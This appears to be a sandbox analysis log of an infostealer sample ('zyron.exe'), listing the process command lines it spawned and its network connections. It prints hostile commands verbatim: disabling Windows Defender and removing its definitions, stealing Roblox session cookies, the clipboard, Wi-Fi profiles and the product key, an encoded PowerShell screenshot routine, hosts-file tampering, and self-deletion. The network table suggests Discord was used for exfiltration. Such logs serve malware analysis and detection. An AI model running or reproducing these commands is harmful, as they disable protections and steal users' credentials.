\??\c:\users\admin\appdata\local\temp\zyron.exe 

c:\users\admin\appdata\local\temp\zyron.exe 

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'c:\users\admin\appdata\local\temp\zyron.exe '"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Je ne serais pas résponsable des choses que tu feras avec ce tool', 0, 'Message de Tookie', 48+16);close()""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'c:\users\admin\appdata\local\temp\zyron.exe '

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\system32\mshta.exe

mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Je ne serais pas résponsable des choses que tu feras avec ce tool', 0, 'Message de Tookie', 48+16);close()"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h +s "c:\users\admin\appdata\local\temp\zyron.exe ""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎​   .scr'"

C:\Windows\system32\attrib.exe

attrib +h +s "c:\users\admin\appdata\local\temp\zyron.exe "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎​   .scr'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\attrib.exe

attrib -r C:\Windows\System32\drivers\etc\hosts

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xnurk0kv\xnurk0kv.cmdline"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFBD0.tmp" "c:\Users\Admin\AppData\Local\Temp\xnurk0kv\CSCA3421DF6F66549FE8B28B09F4344214B.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\attrib.exe

attrib +r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI57962\rar.exe a -r -hp"Tookie57!" "C:\Users\Admin\AppData\Local\Temp\FI9R0.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI57962\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI57962\rar.exe a -r -hp"Tookie57!" "C:\Users\Admin\AppData\Local\Temp\FI9R0.zip" *

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\wmsetup.log

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\Resources\Themes\icsys.icn.exe

C:\Windows\Resources\Themes\icsys.icn.exe

\??\c:\windows\resources\themes\explorer.exe

c:\windows\resources\themes\explorer.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "c:\users\admin\appdata\local\temp\zyron.exe ""

C:\Windows\system32\PING.EXE

ping localhost -n 3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\jawshtml.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fffaf7e46f8,0x7fffaf7e4708,0x7fffaf7e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2020,878826232115211738,3918295721067643570,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2024 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2020,878826232115211738,3918295721067643570,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2020,878826232115211738,3918295721067643570,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,878826232115211738,3918295721067643570,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,878826232115211738,3918295721067643570,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2020,878826232115211738,3918295721067643570,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5180 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2020,878826232115211738,3918295721067643570,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5180 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 blank-2qkse.in udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 227.16.217.172.in-addr.arpa udp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 72.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 232.137.159.162.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
